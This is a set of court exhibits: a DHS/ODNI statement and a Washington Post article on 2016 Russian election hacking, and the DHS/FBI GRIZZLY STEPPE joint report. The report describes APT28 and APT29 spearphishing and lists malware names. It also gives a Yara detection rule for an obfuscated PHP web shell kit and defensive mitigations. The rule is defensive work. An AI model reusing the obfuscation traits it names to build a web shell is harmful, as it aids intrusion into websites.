Co-founder and CTO of Crowdstrike, Dmitri Alperovitch leads the Intelligence, Technology and CrowdStrike Labs teams. Alperovitch has invented 18 patented technologies and has conducted extensive research on reputation systems, spam detection, web security, public-key and identity-based cryptography, malware and intrusion detection/prevention. He is a renowned computer security researcher and thought leader on cybersecurity policies and state tradecraft. Alperovitch's many honors include being selected as MIT Technology Review's "Young Innovators under 35" (TR35) in 2013. He also was named Foreign Policy Magazine's Leading Global Thinker for 2013 and received a Federal 100 Award for his information security contributions.

## Related Content





Access our most popular resources

### Clickjacking

Kovter is a well known form of clickjacking malware that has been around for years. While…

### macOS 10.13

Introduction Analysts that perform macOS forensics have had few, if any, artifacts of program execution to…

excited to join more than 17,000 security experts in Las Vegas this August for…

---

## TRY CROWDSTRIKE FREE FOR 15 DAYS

### GET STARTED WITH A FREE TRIAL



Copyright © 2018 CrowdStrike   |   Privacy   |   Request Info   |   Blog   |   Join Our Team   |   Sitemap   |

Contact Us   |   1.888.512.8906

English  ^

Access our most popular resources   ^

# Exhibit 3
# to Bensinger Declaration

/   ODNI Home (/index.php)   /   Who We Are (/index.php/nctc-who-we-are)   /   Organization (/index.php/nctc-who-we-are/organization)
/   About (/index.php/nctc-who-we-are/organization/123-about)   /   Organization (/index.php/nctc-who-we-are/organization/124-about/organization)   /   Information Sharing Environment (/index.php/nctc-who-we-are/organization/201-about/organization/information-sharing-environment)   /   News (/index.php/who-we-are/organizations/national-security-partnerships/ise/ise-archive/ise-news)

# JOINT DHS, ODNI, FBI STATEMENT ON RUSSIAN MALICIOUS CYBER ACTIVITY

On October 7, 2016, DHS Secretary Jeh Johnson and ODNI Director James Clapper issued a joint statement that the intelligence community is confident the Russian Government directed the recent compromises of e-mails from U.S. persons and institutions, including from U.S. political organizations, and that the disclosures of alleged hacked e-mails on sites like DCLeaks.com and WikiLeaks are consistent with the Russian-directed efforts.  The statement also noted that the Russians have used similar tactics and techniques across Europe and Eurasia to influence public opinion there.

Today, DHS and FBI released a Joint Analysis Report (JAR) which further expands on that statement by providing details of the tools and infrastructure used by Russian intelligence services to compromise and exploit networks and infrastructure associated with the recent U.S. election, as well as a range of U.S. government, political and private sector entities.  To view the report, click here (https://www.ise.gov/resources/document-library/dhs-and-fbi-joint-analysis-report-russian-malicious-cyber-activity).

This activity by Russian intelligence services is part of a decade-long campaign of cyber-enabled operations directed at the U.S. Government and its citizens. These cyber operations have included spearphishing, campaigns targeting government organizations, critical infrastructure, think tanks, universities, political organizations, and corporations; theft of information from these organizations; and the recent public release of some of this stolen information.  In other countries, Russian intelligence services have also undertaken damaging and disruptive cyber-attacks, including on critical infrastructure, in some cases masquerading as third parties or hiding behind false online personas designed to cause victim to misattribute the source of the attack.  The Joint Analysis Report provides technical indicators related to many of these operations, recommended mitigations and information on how to report such incidents to the U.S. Government.

A great deal of analysis and forensic information related to Russian government activity has been published by a wide range of security companies.  The U.S. Government can confirm that the Russian government, including Russia's civilian and military intelligence services, conducted many of the activities generally described by a number of these security companies.  The Joint Analysis Report recognizes the excellent work undertaken by security companies and private sector network owners and operators, and provides new indicators of compromise and

malicious infrastructure identified during the course of investigations and incident response. The U.S. Government seeks to arm network defenders with the tools they need to identify,, detect and disrupt Russian malicious cyber activity that is targeting our country's and our allies' networks.

We encourage security companies and private sector owners and operators to look back within their network traffic for signs of the malicious activity described in the Joint Analysis Report. We also encourage such entities to utilize these indicators in their proactive defense efforts to block malicious cyber activity before it occurs. DHS has already added these indicators to its Automated Indicator Sharing service, which provides indicators of malicious cyber activity at machine speed. Entities that are participating in this service have already implemented these indicators for the network protection activities.

Entities that find signs of this malicious cyber activity should report it to the FBI through CyWatch or its local field offices or to DHS's National Cybersecurity and Communications Integration Center (NCCIC).

## RELATED DOCUMENTS

Intelligence Reform and Terrorism Prevention Act of 2004
(/files/NCTC/documents/RelatedContent_documents/Intelligence_Reform_Act.pdf)

Executive Order 13354 National Counterterrorism Center
(/files/NCTC/documents/RelatedContent_documents/eo13354.pdf)

NCTC Attorney General Guidelines (/files/NCTC/documents/RelatedContent_documents/NCTCGuidelines.pdf)

## RELATED LINKS

Russell Travers, Acting Director (/index.php/nctc-who-we-are/director-nctc)

Tricia S. Wellman, Executive Director (/index.php/nctc-who-we-are/executive-director-nctc)

**Mission/Vision (/index.php/nctc-who-we-are/mission-vision)**

**History (/index.php/nctc-who-we-are/history)**

**Organization (/index.php/nctc-who-we-are/organization)**

**Acting Director NCTC (/index.php/nctc-who-we-are/director-nctc)**

**Executive Director NCTC (/index.php/nctc-who-we-are/executive-director-nctc)**

Office *of the*
Director *of* National Intelligence (/index.php)

## ODNI Centers

Cyber Threat Intelligence Integration Center (/index.php/ctiic-home)

National Counterproliferation Center (/index.php/ncpc-home)

National Counterintelligence and Security Center (/index.php/ncsc-home)

National Counterterrorism Center (/index.php/nctc-home)

## ODNI Offices

Equal Employment Opportunity & Diversity (/index.php/who-we-are/organizations/eeod/eeod-who-we-are)

IC Chief Human Capital Officer (/index.php/who-we-are/organizations/enterprise-capacity/chco/chco-who-we-are)

IC Inspector General (/index.php/who-we-are/organizations/ic-ig/ic-ig-who-we-are)

Office of Civil Liberties, Privacy, and Transparency (/index.php/who-we-are/organizations/clpt/clpt-who-we-are)

More Offices (/index.php/who-we-are/organizations)

## Information

Contact the ODNI (/index.php/contact-the-odni)

Visit the IC IG (/index.php/contact-the-icig)

No FEAR Act (/index.php/no-fear-act)

Privacy Policy (/index.php/privacy-policy)

Customer Service (/index.php/customer-service)

FOIA (/index.php/foia)

## Useful Links

For Kids (/index.php/for-kids)

Ready.gov (http://www.ready.gov)

Open.gov (http://www.whitehouse.gov/open)

Flu.gov (https://www.cdc.gov/flu/)

Plain Language Act (/index.php/plain-language-act)

Furlough Resources (/index.php/furlough-resources)

ODNI Operating Status (/index.php/odni-operating-status)

Adobe Acrobat Reader (https://get.adobe.com/reader/)

(https://service.govdelivery.com/accounts/USODNI/subscriber/new)

(/index.php/newsroom?format=feed&type=rss)        (http://www.icontherecord.tumblr.com/)

(https://www.twitter.com/odnigov)        (http://www.facebook.com/dni.gov)

(http://www.flickr.com/photos/odnigov)        (http://www.youtube.com/odnigov)

(http://www.scribd.com/odnigov)   contact us (/index.php/more)

# Exhibit 4
# to Bensinger Declaration

The Washington Post

## National Security

# Secret CIA assessment says Russia was trying to help Trump win White House

By Adam Entous ,



Adam Entous

Reporter who wrote about national security, foreign policy and intelligence.

Bio 🡵

Ellen Nakashima and



Ellen Nakashima

National security reporter

Email ✉ Bio 🡵 Follow 🐦

Greg Miller



Greg Miller

Reporter covering national security

Email ✉ Bio 🡵 Follow 🐦

December 9, 2016

The CIA has concluded in a secret assessment that Russia intervened in the 2016 election to help Donald Trump win the presidency, rather than just to undermine confidence in the U.S. electoral system, according to officials briefed on the matter.

Case 0:17-cv-60426-UU  Document 267-3  Entered on FLSD Docket 11/05/2018  Page 36 of 54

Intelligence agencies have identified individuals with connections to the Russian government who provided WikiLeaks with thousands of hacked emails from the Democratic National Committee and others, including Hillary Clinton's campaign chairman, according to U.S. officials. Those officials described the individuals as actors known to the intelligence community and part of a wider Russian operation to boost Trump and hurt Clinton's chances.

"It is the assessment of the intelligence community that Russia's goal here was to favor one candidate over the other, to help Trump get elected," said a senior U.S. official briefed on an intelligence presentation made to U.S. senators. "That's the consensus view."

The Obama administration has been debating for months how to respond to the alleged Russian intrusions, with White House officials concerned about escalating tensions with Moscow and being accused of trying to boost Clinton's campaign.

In September, during a secret briefing for congressional leaders, Senate Majority Leader Mitch McConnell (R-Ky.) voiced doubts about the veracity of the intelligence, according to officials present.

The Trump transition team dismissed the findings in a short statement issued Friday evening. "These are the same people that said Saddam Hussein had weapons of mass destruction. The election ended a long time ago in one of the biggest Electoral College victories in history. It's now time to move on and 'Make America Great Again,' " the statement read.

Trump has consistently dismissed the intelligence community's findings about Russian hacking.

"I don't believe they interfered" in the election, he told Time magazine this week. The hacking, he said, "could be Russia. And it could be China. And it could be some guy in his home in New Jersey."

The CIA shared its latest assessment with key senators in a closed-door briefing on Capitol Hill last week, in which agency officials cited a growing body of intelligence from multiple sources. Agency briefers told the senators it was now "quite clear" that electing Trump was Russia's goal, according to the officials, who spoke on the condition of anonymity to discuss intelligence matters.

The CIA presentation to senators about Russia's intentions fell short of a formal U.S. assessment produced by all 17 intelligence agencies. A senior U.S. official said there were minor disagreements among intelligence officials about the agency's assessment, in part because some questions remain unanswered.

For example, intelligence agencies do not have specific intelligence showing officials in the Kremlin "directing" the identified individuals to pass the Democratic emails to WikiLeaks, a second senior U.S. official said. Those actors, according to the official, were "one step" removed from the Russian

government, rather than government employees. Moscow has in the past used middlemen to participate in sensitive intelligence operations so it has plausible deniability.

Julian Assange, the founder of WikiLeaks, has said in a television interview that the "Russian government is not the source."

The White House and CIA officials declined to comment.

On Friday, the White House said President Obama had ordered a "full review" of Russian hacking during the election campaign, as pressure from Congress has grown for greater public understanding of exactly what Moscow did to influence the electoral process.

"We may have crossed into a new threshold, and it is incumbent upon us to take stock of that, to review, to conduct some after-action, to understand what has happened and to impart some lessons learned," Obama's counterterrorism and homeland security adviser, Lisa Monaco, told reporters at a breakfast hosted by the Christian Science Monitor.

Obama wants the report before he leaves office Jan. 20, Monaco said. The review will be led by James Clapper, the outgoing director of national intelligence, officials said.

During her remarks, Monaco didn't address the latest CIA assessment, which hasn't been previously disclosed.

Seven Democratic senators last week asked Obama to declassify details about the intrusions and why officials believe that the Kremlin was behind the operation. Officials said Friday that the senators specifically were asking the White House to release portions of the CIA's presentation.

This week, top Democratic lawmakers in the House also sent a letter to Obama, asking for briefings on Russian interference in the election.

U.S. intelligence agencies have been cautious for months in characterizing Russia's motivations, reflecting the United States' long-standing struggle to collect reliable intelligence on President Vladimir Putin and those closest to him.

In previous assessments, the CIA and other intelligence agencies told the White House and congressional leaders that they believed Moscow's aim was to undermine confidence in the U.S. electoral system. The assessments stopped short of saying the goal was to help elect Trump.

On Oct. 7, the intelligence community officially accused Moscow of seeking to interfere in the election through the hacking of "political organizations." Though the statement never specified which party, it was clear that officials were referring to cyber-intrusions into the computers of the DNC and other Democratic groups and individuals.

Some key Republican lawmakers have continued to question the quality of evidence supporting Russian involvement.

"I'll be the first one to come out and point at Russia if there's clear evidence, but there is no clear evidence — even now," said Rep. Devin Nunes (R-Calif.), the chairman of the House Intelligence Committee and a member of the Trump transition team. "There's a lot of innuendo, lots of circumstantial evidence, that's it."

Though Russia has long conducted cyberspying on U.S. agencies, companies and organizations, this presidential campaign marks the first time Moscow has attempted through cyber-means to interfere in, if not actively influence, the outcome of an election, the officials said.

The reluctance of the Obama White House to respond to the alleged Russian intrusions before Election Day upset Democrats on the Hill as well as members of the Clinton campaign.

Within the administration, top officials from different agencies sparred over whether and how to respond. White House officials were concerned that covert retaliatory measures might risk an escalation in which Russia, with sophisticated cyber-capabilities, might have less to lose than the United States, with its vast and vulnerable digital infrastructure.

The White House's reluctance to take that risk left Washington weighing more-limited measures, including the "naming and shaming" approach of publicly blaming Moscow.

By mid-September, White House officials had decided it was time to take that step, but they worried that doing so unilaterally and without bipartisan congressional backing just weeks before the election would make Obama vulnerable to charges that he was using intelligence for political purposes.

Instead, officials devised a plan to seek bipartisan support from top lawmakers and set up a secret meeting with the Gang of 12 — a group that includes House and Senate leaders, as well as the chairmen and ranking members of both chambers' committees on intelligence and homeland security.

Obama dispatched Monaco, FBI Director James B. Comey and Homeland Security Secretary Jeh Johnson to make the pitch for a "show of solidarity and bipartisan unity" against Russian interference in the election, according to a senior administration official.

Specifically, the White House wanted congressional leaders to sign off on a bipartisan statement urging state and local officials to take federal help in protecting their voting-registration and balloting machines from Russian cyber-intrusions.

Though U.S. intelligence agencies were skeptical that hackers would be able to manipulate the election results in a systematic way, the White House feared that Russia would attempt to do so, sowing doubt

about the fundamental mechanisms of democracy and potentially forcing a more dangerous confrontation between Washington and Moscow.

In a secure room in the Capitol used for briefings involving classified information, administration officials broadly laid out the evidence U.S. spy agencies had collected, showing Russia's role in cyber-intrusions in at least two states and in hacking the emails of the Democratic organizations and individuals.

And they made a case for a united, bipartisan front in response to what one official described as "the threat posed by unprecedented meddling by a foreign power in our election process."

The Democratic leaders in the room unanimously agreed on the need to take the threat seriously. Republicans, however, were divided, with at least two GOP lawmakers reluctant to accede to the White House requests.

According to several officials, McConnell raised doubts about the underlying intelligence and made clear to the administration that he would consider any effort by the White House to challenge the Russians publicly an act of partisan politics.

Some of the Republicans in the briefing also seemed opposed to the idea of going public with such explosive allegations in the final stages of an election, a move that they argued would only rattle public confidence and play into Moscow's hands.

McConnell's office did not respond to a request for comment. After the election, Trump chose McConnell's wife, Elaine Chao, as his nominee for transportation secretary.

Some Clinton supporters saw the White House's reluctance to act without bipartisan support as further evidence of an excessive caution in facing adversaries.

"The lack of an administration response on the Russian hacking cannot be attributed to Congress," said Rep. Adam B. Schiff (Calif.), the ranking Democrat on the House Intelligence Committee, who was at the September meeting. "The administration has all the tools it needs to respond. They have the ability to impose sanctions. They have the ability to take clandestine means. The administration has decided not to utilize them in a way that would deter the Russians, and I think that's a problem."

*Philip Rucker contributed to this report.*

💬 **27871 Comments**

**Adam Entous**


Adam Entous wrote about national security, foreign policy and intelligence. He left The Washington Post in December 2017. He joined the newspaper in 2016 after more than 20 years with the Wall Street Journal and Reuters, where he covered the Pentagon, CIA, White House and Congress.


**Ellen Nakashima**
Ellen Nakashima is a national security reporter for The Washington Post. She covers cybersecurity, surveillance, counterterrorism and intelligence issues. She has also served as a Southeast Asia correspondent and covered the White House and Virginia state politics. She joined The Post in 1995.
Follow 🐦


**Greg Miller**
Greg Miller is a national security correspondent for The Washington Post. He was among the Post reporters awarded the 2014 Pulitzer Prize for coverage of U.S. surveillance programs revealed by Edward Snowden and a finalist for the 2013 Pulitzer Prize. He previously worked for the Los Angeles Times.
Follow 🐦



### Share news tips with us confidentially

Do you have information the public should know? Here are some ways you can securely send information and documents to Post journalists.

**Learn more**

# Exhibit 5
# to Bensinger Declaration

TLP:WHITE





**JOINT ANALYSIS REPORT**

*DISCLAIMER: This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained within. DHS does not endorse any commercial product or service referenced in this advisory or otherwise. This document is distributed as **TLP:WHITE**: Subject to standard copyright rules, **TLP:WHITE** information may be distributed without restriction. For more information on the Traffic Light Protocol, see https://www.us-cert.gov/tlp.*

**Reference Number: JAR-16-20296A**                    **December 29, 2016**

# GRIZZLY STEPPE – Russian Malicious Cyber Activity

## Summary

This Joint Analysis Report (JAR) is the result of analytic efforts between the Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI). This document provides technical details regarding the tools and infrastructure used by the Russian civilian and military intelligence Services (RIS) to compromise and exploit networks and endpoints associated with the U.S. election, as well as a range of U.S. Government, political, and private sector entities. The U.S. Government is referring to this malicious cyber activity by RIS as GRIZZLY STEPPE.

Previous JARs have not attributed malicious cyber activity to specific countries or threat actors. However, public attribution of these activities to RIS is supported by technical indicators from the U.S. Intelligence Community, DHS, FBI, the private sector, and other entities. This determination expands upon the Joint Statement released October 7, 2016, from the Department of Homeland Security and the Director of National Intelligence on Election Security.

This activity by RIS is part of an ongoing campaign of cyber-enabled operations directed at the U.S. government and its citizens. These cyber operations have included spearphishing campaigns targeting government organizations, critical infrastructure entities, think tanks, universities, political organizations, and corporations leading to the theft of information. In foreign countries, RIS actors conducted damaging and/or disruptive cyber-attacks, including attacks on critical infrastructure networks. In some cases, RIS actors masqueraded as third parties, hiding behind false online personas designed to cause the victim to misattribute the source of the attack. This JAR provides technical indicators related to many of these operations, recommended mitigations, suggested actions to take in response to the indicators provided, and information on how to report such incidents to the U.S. Government.



## Description

The U.S. Government confirms that two different RIS actors participated in the intrusion into a U.S. political party. The first actor group, known as Advanced Persistent Threat (APT) 29, entered into the party's systems in summer 2015, while the second, known as APT28, entered in spring 2016.



**Figure 1: The tactics and techniques used by APT29 and APT 28 to conduct cyber intrusions against target systems**

Both groups have historically targeted government organizations, think tanks, universities, and corporations around the world. APT29 has been observed crafting targeted spearphishing campaigns leveraging web links to a malicious dropper; once executed, the code delivers Remote Access Tools (RATs) and evades detection using a range of techniques. APT28 is known for leveraging domains that closely mimic those of targeted organizations and tricking potential victims into entering legitimate credentials. APT28 actors relied heavily on shortened URLs in their spearphishing email campaigns. Once APT28 and APT29 have access to victims, both groups exfiltrate and analyze information to gain intelligence value. These groups use this information to craft highly targeted spearphishing campaigns. These actors set up operational infrastructure to obfuscate their source infrastructure, host domains and malware for targeting organizations, establish command and control nodes, and harvest credentials and other valuable information from their targets.

In summer 2015, an APT29 spearphishing campaign directed emails containing a malicious link to over 1,000 recipients, including multiple U.S. Government victims. APT29 used legitimate

**TLP:WHITE**

domains, to include domains associated with U.S. organizations and educational institutions, to host malware and send spearphishing emails. In the course of that campaign, APT29 successfully compromised a U.S. political party. At least one targeted individual activated links to malware hosted on operational infrastructure of opened attachments containing malware. APT29 delivered malware to the political party's systems, established persistence, escalated privileges, enumerated active directory accounts, and exfiltrated email from several accounts through encrypted connections back through operational infrastructure.

In spring 2016, APT28 compromised the same political party, again via targeted spearphishing. This time, the spearphishing email tricked recipients into changing their passwords through a fake webmail domain hosted on APT28 operational infrastructure. Using the harvested credentials, APT28 was able to gain access and steal content, likely leading to the exfiltration of information from multiple senior party members. The U.S. Government assesses that information was leaked to the press and publicly disclosed.



Figure 2: APT28's Use of Spearphishing and Stolen Credentials

Actors likely associated with RIS are continuing to engage in spearphishing campaigns, including one launched as recently as November 2016, just days after the U.S. election.

**TLP:WHITE**

*Reported Russian Military and Civilian Intelligence Services (RIS)*

| Alternate Names |
| --- |
| APT28 |
| APT29 |
| Agent.btz |
| BlackEnergy V3 |
| BlackEnergy2 APT |
| CakeDuke |
| Carberp |
| CHOPSTICK |
| CloudDuke |
| CORESHELL |
| CosmicDuke |
| COZYBEAR |
| COZYCAR |
| COZYDUKE |
| CrouchingYeti |
| DIONIS |
| Dragonfly |
| Energetic Bear |
| EVILTOSS |
| Fancy Bear |
| GeminiDuke |
| GREY CLOUD |
| HammerDuke |
| HAMMERTOSS |
| Havex |
| MiniDionis |
| MiniDuke |
| OLDBAIT |
| OnionDuke |
| Operation Pawn Storm |
| PinchDuke |
| Powershell backdoor |
| Quedagh |
| Sandworm |
| SEADADDY |
| Seaduke |
| SEDKIT |
| SEDNIT |
| Skipper |
| Sofacy |
| SOURFACE |
| SYNful Knock |
| Tiny Baron |
| Tsar Team |
| twain_64.dll (64-bit X-Agent implant) |
| VmUpgradeHelper.exe (X-Tunnel implant) |
| Waterbug |
| X-Agent |

TLP:WHITE

## Technical Details

### Indicators of Compromise (IOCs)

IOCs associated with RIS cyber actors are provided within the accompanying .csv and .stix files of JAR-16-20296.

### Yara Signature

```
rule PAS_TOOL_PHP_WEB_KIT
{
meta:
description = "PAS TOOL PHP WEB KIT FOUND"
strings:
$php = "<?php"
$base64decode = /\='base'\.\(\d+\*\d+\)\.'_de'\.'code'/
$strreplace = "(str_replace("
$md5 = ".substr(md5(strrev("
$gzinflate = "gzinflate"
$cookie = "_COOKIE"
$isset = "isset"
condition:
(filesize > 20KB and filesize < 22KB) and
#cookie == 2 and
#isset == 3 and
all of them
}
```

### Actions to Take Using Indicators

DHS recommends that network administrators review the IP addresses, file hashes, and Yara signature provided and add the IPs to their watchlist to determine whether malicious activity has been observed within their organizations. The review of network perimeter netflow or firewall logs will assist in determining whether your network has experienced suspicious activity.

When reviewing network perimeter logs for the IP addresses, organizations may find numerous instances of these IPs attempting to connect to their systems. Upon reviewing the traffic from these IPs, some traffic may correspond to malicious activity, and some may correspond to legitimate activity. Some traffic that may appear legitimate is actually malicious, such as vulnerability scanning or browsing of legitimate public facing services (e.g., HTTP, HTTPS, FTP). Connections from these IPs may be performing vulnerability scans attempting to identify websites that are vulnerable to cross-site scripting (XSS) or Structured Query Language (SQL) injection attacks. If scanning identified vulnerable sites, attempts to exploit the vulnerabilities may be experienced.

TLP:WHITE

Network administrators are encouraged to check their public-facing websites for the malicious file hashes. System owners are also advised to run the Yara signature on any system that is suspected to have been targeted by RIS actors.

### Threats from IOCs

Malicious actors may use a variety of methods to interfere with information systems. Some methods of attack are listed below. Guidance provided is applicable to many other computer networks.

- **Injection Flaws** are broad web application attack techniques that attempt to send commands to a browser, database, or other system, allowing a regular user to control behavior. The most common example is SQL injection, which subverts the relationship between a webpage and its supporting database, typically to obtain information contained inside the database. Another form is command injection, where an untrusted user is able to send commands to operating systems supporting a web application or database. See the United States Computer Emergency Readiness Team (US-CERT) Publication on SQL Injection for more information.
- **Cross-site scripting (XSS) vulnerabilities** allow threat actors to insert and execute unauthorized code in web applications. Successful XSS attacks on websites can provide the attacker unauthorized access. For prevention and mitigation strategies against XSS, see US-CERT's Alert on Compromised Web Servers and Web Shells.
- **Server vulnerabilities** may be exploited to allow unauthorized access to sensitive information. An attack against a poorly configured server may allow an adversary access to critical information including any websites or databases hosted on the server. See US-CERT's Tip on Website Security for additional information.

## Recommended Mitigations

### Commit to Cybersecurity Best Practices

A commitment to good cybersecurity and best practices is critical to protecting networks and systems. Here are some questions you may want to ask your organization to help prevent and mitigate against attacks.

1. **Backups**: Do we backup all critical information? Are the backups stored offline? Have we tested our ability to revert to backups during an incident?
2. **Risk Analysis**: Have we conducted a cybersecurity risk analysis of the organization?
3. **Staff Training**: Have we trained staff on cybersecurity best practices?
4. **Vulnerability Scanning & Patching**: Have we implemented regular scans of our network and systems and appropriate patching of known system vulnerabilities?
5. **Application Whitelisting**: Do we allow only approved programs to run on our networks?
6. **Incident Response**: Do we have an incident response plan and have we practiced it?

7.  **Business Continuity**: Are we able to sustain business operations without access to certain systems? For how long? Have we tested this?
8.  **Penetration Testing**: Have we attempted to hack into our own systems to test the security of our systems and our ability to defend against attacks?

*Top Seven Mitigation Strategies*

DHS encourages network administrators to implement the recommendations below, which can prevent as many as 85 percent of targeted cyber-attacks. These strategies are common sense to many, but DHS continues to see intrusions because organizations fail to use these basic measures.

1.  **Patch applications and operating systems –** Vulnerable applications and operating systems are the targets of most attacks. Ensuring these are patched with the latest updates greatly reduces the number of exploitable entry points available to an attacker. Use best practices when updating software and patches by only downloading updates from authenticated vendor sites.
2.  **Application whitelisting –** Whitelisting is one of the best security strategies because it allows only specified programs to run while blocking all others, including malicious software.
3.  **Restrict administrative privileges –** Threat actors are increasingly focused on gaining control of legitimate credentials, especially those associated with highly privileged accounts. Reduce privileges to only those needed for a user's duties. Separate administrators into privilege tiers with limited access to other tiers.
4.  **Network Segmentation and Segregation into Security Zones –** Segment networks into logical enclaves and restrict host-to-host communications paths. This helps protect sensitive information and critical services and limits damage from network perimeter breaches.
5.  **Input validation –** Input validation is a method of sanitizing untrusted user input provided by users of a web application, and may prevent many types of web application security flaws, such as SQLi, XSS, and command injection.
6.  **File Reputation –** Tune Anti-Virus file reputation systems to the most aggressive setting possible; some products can limit execution to only the highest reputation files, stopping a wide range of untrustworthy code from gaining control.
7.  **Understanding firewalls –** When anyone or anything can access your network at any time, your network is more susceptible to being attacked. Firewalls can be configured to block data from certain locations (IP whitelisting) or applications while allowing relevant and necessary data through.

TLP:WHITE

*Responding to Unauthorized Access to Networks*

**Implement your security incident response and business continuity plan**. It may take time for your organization's IT professionals to isolate and remove threats to your systems and restore normal operations. Meanwhile, you should take steps to maintain your organization's essential functions according to your business continuity plan. Organizations should maintain and regularly test backup plans, disaster recovery plans, and business continuity procedures.

**Contact DHS or law enforcement immediately**. We encourage you to contact DHS NCCIC (NCCICCustomerService@hq.dhs.gov or 888-282-0870), the FBI through a local field office or the FBI's Cyber Division (CyWatch@ic.fbi.gov or 855-292-3937) to report an intrusion and to request incident response resources or technical assistance.

# Detailed Mitigation Strategies

*Protect Against SQL Injection and Other Attacks on Web Services*

Routinely evaluate known and published vulnerabilities, perform software updates and technology refreshes periodically, and audit external-facing systems for known Web application vulnerabilities. Take steps to harden both Web applications and the servers hosting them to reduce the risk of network intrusion via this vector.[1]

- Use and configure available firewalls to block attacks.
- Take steps to further secure Windows systems such as installing and configuring Microsoft's Enhanced Mitigation Experience Toolkit (EMET) and Microsoft AppLocker.
- Monitor and remove any unauthorized code present in any www directories.
- Disable, discontinue, or disallow the use of Internet Control Message Protocol (ICMP) and Simple Network Management Protocol (SNMP) and response to these protocols as much as possible.
- Remove non-required HTTP verbs from Web servers as typical Web servers and applications only require GET, POST, and HEAD.
- Where possible, minimize server fingerprinting by configuring Web servers to avoid responding with banners identifying the server software and version number.
- Secure both the operating system and the application.
- Update and patch production servers regularly.
- Disable potentially harmful SQL-stored procedure calls.
- Sanitize and validate input to ensure that it is properly typed and does not contain escaped code.
- Consider using type-safe stored procedures and prepared statements.
- Perform regular audits of transaction logs for suspicious activity.
- Perform penetration testing against Web services.
- Ensure error messages are generic and do not expose too much information.

---

[1] http://msdn.microsoft.com/en-us/library/ff648653.aspx. Web site last accessed April 11, 2016.

TLP:WHITE

**TLP:WHITE**

*Phishing and Spearphishing*
- Implement a Sender Policy Framework (SPF) record for your organization's Domain Name System (DNS) zone file to minimize risks relating to the receipt of spoofed messages.
- Educate users to be suspicious of unsolicited phone calls, social media interactions, or email messages from individuals asking about employees or other internal information. If an unknown individual claims to be from a legitimate organization, try to verify his or her identity directly with the company.
- Do not provide personal information or information about your organization, including its structure or networks, unless you are certain of a person's authority to have the information.
- Do not reveal personal or financial information in social media or email, and do not respond to solicitations for this information. This includes following links sent in email.
- Pay attention to the URL of a website. Malicious websites may look identical to a legitimate site, but the URL often includes a variation in spelling or a different domain than the valid website (e.g., .com vs. .net).
- If you are unsure whether an email request is legitimate, try to verify it by contacting the company directly. Do not use contact information provided on a website connected to the request; instead, check previous statements for contact information. Information about known phishing attacks is also available online from groups such as the Anti-Phishing Working Group (http://www.antiphishing.org).
- Take advantage of anti-phishing features offered by your email client and web browser.
- Patch all systems for critical vulnerabilities, prioritizing timely patching of software that processes Internet data, such as web browsers, browser plugins, and document readers.


*Permissions, Privileges, and Access Controls*
- Reduce privileges to only those needed for a user's duties.
- Restrict users' ability (permissions) to install and run unwanted software applications, and apply the principle of "Least Privilege" to all systems and services. Restricting these privileges may prevent malware from running or limit its capability to spread through the network.
- Carefully consider the risks before granting administrative rights to users on their own machines.
- Scrub and verify all administrator accounts regularly.
- Configure Group Policy to restrict all users to only one login session, where possible.
- Enforce secure network authentication where possible.
- Instruct administrators to use non-privileged accounts for standard functions such as Web browsing or checking Web mail.

**TLP:WHITE**

**TLP:WHITE**

- Segment networks into logical enclaves and restrict host-to-host communication paths. Containment provided by enclaving also makes incident cleanup significantly less costly.
- Configure firewalls to disallow RDP traffic coming from outside of the network boundary, except for in specific configurations such as when tunneled through a secondary VPN with lower privileges.
- Audit existing firewall rules and close all ports that are not explicitly needed for business. Specifically, carefully consider which ports should be connecting outbound versus inbound.
- Enforce a strict lockout policy for network users and closely monitor logs for failed login activity. This can be indicative of failed intrusion activity.
- If remote access between zones is an unavoidable business need, log and monitor these connections closely.
- In environments with a high risk of interception or intrusion, organizations should consider supplementing password authentication with other forms of authentication such as challenge/response or multifactor authentication using biometric or physical tokens.

### Credentials

- Enforce a tiered administrative model with dedicated administrator workstations and separate administrative accounts that are used exclusively for each tier to prevent tools, such as Mimikatz, for credential theft from harvesting domain-level credentials.
- Implement multi-factor authentication (e.g., smart cards) or at minimum ensure users choose complex passwords that change regularly.
- Be aware that some services (e.g., FTP, telnet, and .rlogin) transmit user credentials in clear text. Minimize the use of these services where possible or consider more secure alternatives.
- Properly secure password files by making hashed passwords more difficult to acquire. Password hashes can be cracked within seconds using freely available tools. Consider restricting access to sensitive password hashes by using a shadow password file or equivalent on UNIX systems.
- Replace or modify services so that all user credentials are passed through an encrypted channel.
- Avoid password policies that reduce the overall strength of credentials. Policies to avoid include lack of password expiration date, lack of lockout policy, low or disabled password complexity requirements, and password history set to zero.
- Ensure that users are not re-using passwords between zones by setting policies and conducting regular audits.
- Use unique passwords for local accounts for each device.

**TLP:WHITE**

*Logging Practices*

- Ensure event logging (applications, events, login activities, security attributes, etc.) is turned on or monitored for identification of security issues.
- Configure network logs to provide enough information to assist in quickly developing an accurate determination of a security incident.
- Upgrade PowerShell to new versions with enhanced logging features and monitor the logs to detect usage of PowerShell commands, which are often malware-related.
- Secure logs, potentially in a centralized location, and protect them from modification.
- Prepare an incident response plan that can be rapidly implemented in case of a cyber intrusion.

*How to Enhance Your Organization's Cybersecurity Posture*

DHS offers a variety of resources for organizations to help recognize and address their cybersecurity risks. Resources include discussion points, steps to start evaluating a cybersecurity program, and a list of hands-on resources available to organizations. For a list of services, visit https://www.us-cert.gov/ccubedvp. Other resources include:

- **The Cyber Security Advisors (CSA)** program bolsters cybersecurity preparedness, risk mitigation, and incident response capabilities of critical infrastructure entities and more closely aligns them with the Federal Government. CSAs are DHS personnel assigned to districts throughout the country and territories, with at least one advisor in each of the 10 CSA regions, which mirror the Federal Emergency Management Agency regions. For more information, email cyberadvisor@hq.dhs.gov.
- **Cyber Resilience Review (CRR)** is a no-cost, voluntary assessment to evaluate and enhance cybersecurity within critical infrastructure sectors, as well as state, local, tribal, and territorial governments. The goal of the CRR is to develop an understanding and measurement of key cybersecurity capabilities to provide meaningful indicators of an entity's operational resilience and ability to manage cyber risk to critical services during normal operations and times of operational stress and crisis. Visit https://www.cert.org/resilience/rmm.html to learn more about the CERT Resilience Management Model.
- **Enhanced Cybersecurity Services (ECS)** helps critical infrastructure owners and operators protect their systems by sharing sensitive and classified cyber threat information with Commercial Service Providers (CSPs) and Operational Implementers (OIs). CSPs then use the cyber threat information to protect CI customers. OIs use the threat information to protect internal networks. For more information, email ECS_Program@hq.dhs.gov.
